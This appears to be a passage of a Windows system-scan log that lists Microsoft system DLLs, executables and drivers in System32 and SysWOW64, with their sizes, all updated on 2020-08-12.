2020-08-12 19:44 - 2020-08-12 19:44 - 002583496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002576896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002552120 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002523136 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002471936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002307584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002289152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002260312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002136064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002096128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002085632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002022400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001942528 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001885184 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001756592 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001751040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001743680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001740800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001697792 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001672544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001669344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001665024 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001660536 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001654312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001612800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001512848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001482568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001420320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001406464 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001397576 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001393960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001366144 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001338368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001319936 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001282872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2020-08-12 19:44 - 2020-08-12 19:44 - 001274128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001215488 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdclt.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001197056 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdengin2.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001182248 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001182208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001149712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001127424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001123344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001101312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001077048 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 001072128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001059328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001055232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001015296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001009664 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 001008128 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000995840 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000963072 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000937984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000917800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000914432 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000897648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000894032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000888352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000875520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000875424 _____ (Microsoft Corporation) C:\WINDOWS\system32\pkeyhelper.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000874296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000867840 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000843776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Language.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000823744 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000822800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000783480 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000782336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000775480 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000718336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.FileExplorer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000716312 _____ (Microsoft Corporation) C:\WINDOWS\system32\StateRepository.Core.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000702976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BTAGService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000690536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000675040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000675024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000672256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiaservc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000671040 _____ (Microsoft Corporation) C:\WINDOWS\system32\computecore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000668672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000661816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000649728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000629760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000593480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000579584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000572200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000568128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000564488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StateRepository.Core.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtrmgr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000548352 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasgcw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000534016 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000522688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.FileExplorer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000495104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2020-08-12 19:44 - 2020-08-12 19:44 - 000467968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000464384 _____ (Microsoft Corporation) C:\WINDOWS\system32\HrtfApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000463168 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000462848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000461112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000457016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnphost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000452096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000441144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000435200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasgcw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\DispBroker.Desktop.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000403456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000379704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000369304 _____ (Microsoft Corporation) C:\WINDOWS\system32\BCP47Langs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\system32\LanguageOverlayServer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000339456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\HrtfApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\RasMediaManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\sti.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000314368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000312832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000307712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000287232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmWmiPl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicCapsule.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\scecli.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000273744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BCP47Langs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\shdocvw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnservice.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatializerApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000247856 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shdocvw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasplap.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000220984 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000214016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scecli.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000211256 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000209208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000201544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_SIUF.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000199680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasplap.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000199480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Winlangdb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBAUDIO.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000194048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SpatializerApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000193592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\weretw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000186472 _____ (Microsoft Corporation) C:\WINDOWS\system32\BCP47mrm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\net1.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000179512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000175104 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAuto.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000165176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000157184 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000152416 _____ (Microsoft Corporation) C:\WINDOWS\system32\KerbClientShared.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdrsvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAuto.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Winlangdb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000133256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BCP47mrm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000132408 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\globinputhost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000127064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdshext.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000124512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KerbClientShared.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceUpdateAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdSSDP.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000104248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\globinputhost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000090936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryBroker.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000089328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicAgent.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManMigrationPlugin.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiarpc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\CustomInstallExec.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpkinstall.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\keepaliveprovider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\udhisapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000066048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManMigrationPlugin.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmRes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmRes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserLanguageProfileCallback.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmprovhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\cellulardatacapabilityhandler.dll
